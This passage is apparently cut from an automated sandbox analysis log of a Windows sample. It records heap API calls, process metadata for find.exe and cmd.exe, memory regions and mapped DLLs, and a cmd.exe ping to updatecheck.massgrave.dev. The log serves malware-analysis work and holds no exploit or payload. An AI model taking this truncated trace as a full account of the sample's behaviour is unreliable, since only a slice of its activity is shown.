MemoryPointer=0x1dc8d1e8f40) returned 0x20 [0178.318] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e8f40) returned 1 [0178.318] GetProcessHeap () returned 0x1dc8d1e0000 [0178.318] GetProcessHeap () returned 0x1dc8d1e0000 [0178.318] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e8ee0) returned 1 [0178.318] GetProcessHeap () returned 0x1dc8d1e0000 [0178.318] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e8ee0) returned 0x20 [0178.319] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e8ee0) returned 1 [0178.319] GetProcessHeap () returned 0x1dc8d1e0000 [0178.319] GetProcessHeap () returned 0x1dc8d1e0000 [0178.319] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e4b60) returned 1 [0178.319] GetProcessHeap () returned 0x1dc8d1e0000 [0178.319] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e4b60) returned 0x18 [0178.319] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e4b60) returned 1 [0178.319] GetProcessHeap () returned 0x1dc8d1e0000 [0178.319] GetProcessHeap () returned 0x1dc8d1e0000 [0178.319] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e90f0) returned 1 [0178.319] GetProcessHeap () returned 0x1dc8d1e0000 [0178.319] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e90f0) returned 0x20 [0178.319] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e90f0) returned 1 [0178.319] GetProcessHeap () returned 0x1dc8d1e0000 [0178.319] GetProcessHeap () returned 0x1dc8d1e0000 [0178.319] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e8eb0) returned 1 [0178.319] GetProcessHeap () returned 0x1dc8d1e0000 [0178.319] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e8eb0) returned 0x1e [0178.320] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e8eb0) returned 1 [0178.320] GetProcessHeap () returned 0x1dc8d1e0000 [0178.320] GetProcessHeap () returned 0x1dc8d1e0000 [0178.320] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e48d0) returned 1 [0178.320] GetProcessHeap () returned 0x1dc8d1e0000 [0178.320] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e48d0) returned 0x18 [0178.320] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e48d0) returned 1 [0178.320] GetProcessHeap () returned 0x1dc8d1e0000 [0178.320] GetProcessHeap () returned 0x1dc8d1e0000 [0178.320] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e8df0) returned 1 [0178.320] GetProcessHeap () returned 0x1dc8d1e0000 [0178.320] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e8df0) returned 0x20 [0178.320] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e8df0) returned 1 [0178.320] GetProcessHeap () returned 0x1dc8d1e0000 [0178.321] GetProcessHeap () returned 0x1dc8d1e0000 [0178.321] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e4c80) returned 1 [0178.321] GetProcessHeap () returned 0x1dc8d1e0000 [0178.321] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e4c80) returned 0x2 [0178.321] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e4c80) returned 1 [0178.321] GetProcessHeap () returned 0x1dc8d1e0000 [0178.321] GetProcessHeap () returned 0x1dc8d1e0000 [0178.321] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e4830) returned 1 [0178.321] GetProcessHeap () returned 0x1dc8d1e0000 [0178.321] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e4830) returned 0x20 [0178.321] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e4830) returned 1 [0178.321] GetProcessHeap () returned 0x1dc8d1e0000 [0178.321] GetProcessHeap () returned 0x1dc8d1e0000 [0178.321] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e4860) returned 1 [0178.321] GetProcessHeap () returned 0x1dc8d1e0000 [0178.321] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e4860) returned 0x20 [0178.322] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e4860) returned 1 [0178.322] GetProcessHeap () returned 0x1dc8d1e0000 [0178.322] GetProcessHeap () returned 0x1dc8d1e0000 [0178.322] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e9000) returned 1 [0178.322] GetProcessHeap () returned 0x1dc8d1e0000 [0178.322] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e9000) returned 0x20 [0178.322] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e9000) returned 1 [0178.322] GetProcessHeap () returned 0x1dc8d1e0000 [0178.322] GetProcessHeap () returned 0x1dc8d1e0000 [0178.322] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e9030) returned 1 [0178.322] GetProcessHeap () returned 0x1dc8d1e0000 [0178.322] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e9030) returned 0x20 [0178.322] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e9030) returned 1 [0178.322] GetProcessHeap () returned 0x1dc8d1e0000 [0178.323] GetProcessHeap () returned 0x1dc8d1e0000 [0178.323] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e4ca0) returned 1 [0178.323] GetProcessHeap () returned 0x1dc8d1e0000 [0178.323] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e4ca0) returned 0x18 [0178.323] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e4ca0) returned 1 [0178.323] GetProcessHeap () returned 0x1dc8d1e0000 [0178.323] GetProcessHeap () returned 0x1dc8d1e0000 [0178.323] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e90c0) returned 1 [0178.323] GetProcessHeap () returned 0x1dc8d1e0000 [0178.323] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e90c0) returned 0x20 [0178.323] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e90c0) returned 1 [0178.323] GetProcessHeap () returned 0x1dc8d1e0000 [0178.323] GetProcessHeap () returned 0x1dc8d1e0000 [0178.323] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e9090) returned 1 [0178.323] GetProcessHeap () returned 0x1dc8d1e0000 [0178.323] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e9090) returned 0x20 [0178.324] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e9090) returned 1 [0178.324] GetProcessHeap () returned 0x1dc8d1e0000 [0178.324] GetProcessHeap () returned 0x1dc8d1e0000 [0178.324] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e8e50) returned 1 [0178.324] GetProcessHeap () returned 0x1dc8d1e0000 [0178.324] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e8e50) returned 0x20 [0178.324] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e8e50) returned 1 [0178.324] GetProcessHeap () returned 0x1dc8d1e0000 [0178.324] GetProcessHeap () returned 0x1dc8d1e0000 [0178.324] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e8f10) returned 1 [0178.324] GetProcessHeap () returned 0x1dc8d1e0000 [0178.324] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e8f10) returned 0x20 [0178.324] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e8f10) returned 1 [0178.324] GetProcessHeap () returned 0x1dc8d1e0000 [0178.325] GetProcessHeap () returned 0x1dc8d1e0000 [0178.325] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e4890) returned 1 [0178.325] GetProcessHeap () returned 0x1dc8d1e0000 [0178.325] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e4890) returned 0x18 [0178.325] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e4890) returned 1 [0178.325] GetProcessHeap () returned 0x1dc8d1e0000 [0178.325] GetProcessHeap () returned 0x1dc8d1e0000 [0178.325] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e9060) returned 1 [0178.325] GetProcessHeap () returned 0x1dc8d1e0000 [0178.325] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e9060) returned 0x20 [0178.325] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e9060) returned 1 [0178.325] GetProcessHeap () returned 0x1dc8d1e0000 [0178.325] GetProcessHeap () returned 0x1dc8d1e0000 [0178.325] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e8d90) returned 1 [0178.325] GetProcessHeap () returned 0x1dc8d1e0000 [0178.325] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e8d90) returned 0x20 [0178.326] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e8d90) returned 1 [0178.326] GetProcessHeap () returned 0x1dc8d1e0000 [0178.326] GetProcessHeap () returned 0x1dc8d1e0000 [0178.326] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e8f70) returned 1 [0178.326] GetProcessHeap () returned 0x1dc8d1e0000 [0178.326] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e8f70) returned 0x20 [0178.326] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e8f70) returned 1 [0178.326] GetProcessHeap () returned 0x1dc8d1e0000 [0178.326] GetProcessHeap () returned 0x1dc8d1e0000 [0178.326] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e8fa0) returned 1 [0178.326] GetProcessHeap () returned 0x1dc8d1e0000 [0178.326] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e8fa0) returned 0x20 [0178.326] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e8fa0) returned 1 [0178.327] GetProcessHeap () returned 0x1dc8d1e0000 [0178.327] GetProcessHeap () returned 0x1dc8d1e0000 [0178.327] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e48b0) returned 1 [0178.327] GetProcessHeap () returned 0x1dc8d1e0000 [0178.327] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e48b0) returned 0x18 [0178.327] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e48b0) returned 1 [0178.327] GetProcessHeap () returned 0x1dc8d1e0000 [0178.327] GetProcessHeap () returned 0x1dc8d1e0000 [0178.327] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e8dc0) returned 1 [0178.327] GetProcessHeap () returned 0x1dc8d1e0000 [0178.327] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e8dc0) returned 0x20 [0178.327] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e8dc0) returned 1 [0178.327] GetProcessHeap () returned 0x1dc8d1e0000 [0178.327] GetProcessHeap () returned 0x1dc8d1e0000 [0178.327] HeapValidate (hHeap=0x1dc8d1e0000, dwFlags=0x0, lpMem=0x1dc8d1e4c60) returned 1 [0178.327] GetProcessHeap () returned 0x1dc8d1e0000 [0178.327] RtlSizeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, MemoryPointer=0x1dc8d1e4c60) returned 0x18 [0178.327] RtlFreeHeap (HeapHandle=0x1dc8d1e0000, Flags=0x0, BaseAddress=0x1dc8d1e4c60) returned 1 [0178.327] exit (_Code=0) Thread: id = 69 os_tid = 0xdcc Process: id = "18" image_name = "find.exe" filename = "c:\\windows\\system32\\find.exe" page_root = "0x2d639000" os_pid = "0xdac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "find /i \"0x0\" " cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1330 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1331 start_va = 0x9de1600000 end_va = 0x9de17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000009de1600000" filename = "" Region: id = 1332 start_va = 0x9de1800000 end_va = 0x9de187ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000009de1800000" filename = "" Region: id = 1333 start_va = 0x25818e30000 end_va = 0x25818e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025818e30000" filename = "" Region: id = 1334 start_va = 0x25818e50000 end_va = 0x25818e64fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025818e50000" filename = "" Region: id = 1335 start_va = 0x25818e70000 end_va = 0x25818e73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025818e70000" filename = "" Region: id = 1336 start_va = 0x25818e80000 end_va = 0x25818e80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025818e80000" filename = "" Region: id = 1337 start_va = 0x25818e90000 end_va = 0x25818e91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025818e90000" filename = "" Region: id = 1338 start_va = 0x7df5ffb90000 end_va = 0x7ff5ffb8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffb90000" filename = "" Region: id = 1339 start_va = 0x7ff623400000 end_va = 0x7ff623422fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff623400000" filename = "" Region: id = 1340 start_va = 0x7ff6242d0000 end_va = 0x7ff6242d8fff monitored = 0 entry_point = 0x7ff6242d2380 region_type = mapped_file name = "find.exe" filename = "\\Windows\\System32\\find.exe" (normalized: "c:\\windows\\system32\\find.exe") Region: id = 1341 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1347 start_va = 0x25818ea0000 end_va = 0x2581916ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025818ea0000" filename = "" Region: id = 1348 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1349 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1350 start_va = 0x25818e30000 end_va = 0x25818e3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000025818e30000" filename = "" Region: id = 1351 start_va = 0x7ff623300000 end_va = 0x7ff6233fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff623300000" filename = "" Region: id = 1358 start_va = 0x25818ea0000 end_va = 0x25818f5dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1359 start_va = 0x25819070000 end_va = 0x2581916ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025819070000" filename = "" Region: id = 1360 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1361 start_va = 0x9de1880000 end_va = 0x9de18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000009de1880000" filename = "" Region: id = 1362 start_va = 0x7ffbe1690000 end_va = 0x7ffbe16c1fff monitored = 0 entry_point = 0x7ffbe169d480 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 1363 start_va = 0x25819170000 end_va = 0x258192effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025819170000" filename = "" Region: id = 1364 start_va = 0x25818e40000 end_va = 0x25818e46fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025818e40000" filename = "" Region: id = 1365 start_va = 0x25818f60000 end_va = 0x25818f66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000025818f60000" filename = "" Region: id = 1372 start_va = 0x7ffbe1860000 end_va = 0x7ffbe186dfff monitored = 0 entry_point = 0x7ffbe18645b0 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\System32\\fsutilext.dll" (normalized: "c:\\windows\\system32\\fsutilext.dll") Region: id = 1373 start_va = 0x258192f0000 end_va = 0x25819626fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1374 start_va = 0x25818f70000 end_va = 0x25818fb2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ulib.dll.mui" filename = "\\Windows\\System32\\en-US\\ulib.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ulib.dll.mui") Thread: id = 68 os_tid = 0xdb4 Thread: id = 70 os_tid = 0xdd0 Process: id = "19" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x2d651000" os_pid = "0xde4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "C:\\Windows\\system32\\cmd.exe /c ping -4 -n 1 updatecheck.massgrave.dev" cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1375 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1376 start_va = 0xa689890000 end_va = 0xa68998ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000a689890000" filename = "" Region: id = 1377 start_va = 0xa689a00000 end_va = 0xa689bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000a689a00000" filename = "" Region: id = 1378 start_va = 0x2763a860000 end_va = 0x2763a87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002763a860000" filename = "" Region: id = 1379 start_va = 0x2763a880000 end_va = 0x2763a894fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002763a880000" filename = "" Region: id = 1380 start_va = 0x2763a8a0000 end_va = 0x2763a8a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002763a8a0000" filename = "" Region: id = 1381 start_va = 0x2763a8b0000 end_va = 0x2763a8b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002763a8b0000" filename = "" Region: id = 1382 start_va = 0x2763a8c0000 end_va = 0x2763a8c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002763a8c0000" filename = "" Region: id = 1383 start_va = 0x7df5ff4d0000 end_va = 0x7ff5ff4cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff4d0000" filename = "" Region: id = 1384 start_va = 0x7ff7bc880000 end_va = 0x7ff7bc8a2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bc880000" filename = "" Region: id = 1385 start_va = 0x7ff7bd6f0000 end_va = 0x7ff7bd749fff monitored = 1 entry_point = 0x7ff7bd7053f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1386 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1387 start_va = 0x2763a8d0000 end_va = 0x2763ab2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002763a8d0000" filename = "" Region: id = 1388 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1389 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1390 start_va = 0x2763a860000 end_va = 0x2763a86ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002763a860000" filename = "" Region: id = 1391 start_va = 0x7ff7bc780000 end_va = 0x7ff7bc87ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bc780000" filename = "" Region: id = 1392 start_va = 0x2763a8d0000 end_va = 0x2763a98dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1393 start_va = 0x2763aa30000 end_va = 0x2763ab2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002763aa30000" filename = "" Region: id = 1394 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1395 start_va = 0xa689c00000 end_va = 0xa689cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000a689c00000" filename = "" Region: id = 1396 start_va = 0x2763ab30000 end_va = 0x2763ac6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002763ab30000" filename = "" Region: id = 1397 start_va = 0x2763a870000 end_va = 0x2763a876fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002763a870000" filename = "" Region: id = 1398 start_va = 0x2763a990000 end_va = 0x2763a996fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002763a990000" filename = "" Region: id = 1399 start_va = 0x2763ac70000 end_va = 0x2763afa6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 71 os_tid = 0xde8 [0178.547] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff7bd6f0000 [0178.547] __set_app_type (_Type=0x1) [0178.547] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff7bd705700) returned 0x0 [0178.547] __getmainargs (in: _Argc=0x7ff7bd720108, _Argv=0x7ff7bd720110, _Env=0x7ff7bd720118, _DoWildCard=0, _StartInfo=0x7ff7bd720124 | out: _Argc=0x7ff7bd720108, _Argv=0x7ff7bd720110, _Env=0x7ff7bd720118) returned 0 [0178.547] GetCurrentThreadId () returned 0xde8 [0178.547] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xde8) returned 0x6c [0178.548] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffbed570000 [0178.548] GetProcAddress (hModule=0x7ffbed570000, lpProcName="SetThreadUILanguage") returned 0x7ffbed593270 [0178.548] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.552] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0178.552] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xa68998f758 | out: phkResult=0xa68998f758*=0x0) returned 0x2 [0178.552] VirtualQuery (in: lpAddress=0xa68998f744, lpBuffer=0xa68998f6c0, dwLength=0x30 | out: lpBuffer=0xa68998f6c0*(BaseAddress=0xa68998f000, AllocationBase=0xa689890000, AllocationProtect=0x4, __alignment1=0xfffff803, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0178.552] VirtualQuery (in: lpAddress=0xa689890000, lpBuffer=0xa68998f6c0, dwLength=0x30 | out: lpBuffer=0xa68998f6c0*(BaseAddress=0xa689890000, AllocationBase=0xa689890000, AllocationProtect=0x4, __alignment1=0xfffff803, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0178.552] VirtualQuery (in: lpAddress=0xa689891000, lpBuffer=0xa68998f6c0, dwLength=0x30 | out: lpBuffer=0xa68998f6c0*(BaseAddress=0xa689891000, AllocationBase=0xa689890000, AllocationProtect=0x4, __alignment1=0xfffff803, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0178.552] VirtualQuery (in: lpAddress=0xa689894000, lpBuffer=0xa68998f6c0, dwLength=0x30 | out: lpBuffer=0xa68998f6c0*(BaseAddress=0xa689894000, AllocationBase=0xa689890000, AllocationProtect=0x4, __alignment1=0xfffff803, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0178.552] VirtualQuery (in: lpAddress=0xa689990000, lpBuffer=0xa68998f6c0, dwLength=0x30 | out: lpBuffer=0xa68998f6c0*(BaseAddress=0xa689990000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0xfffff803, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0, 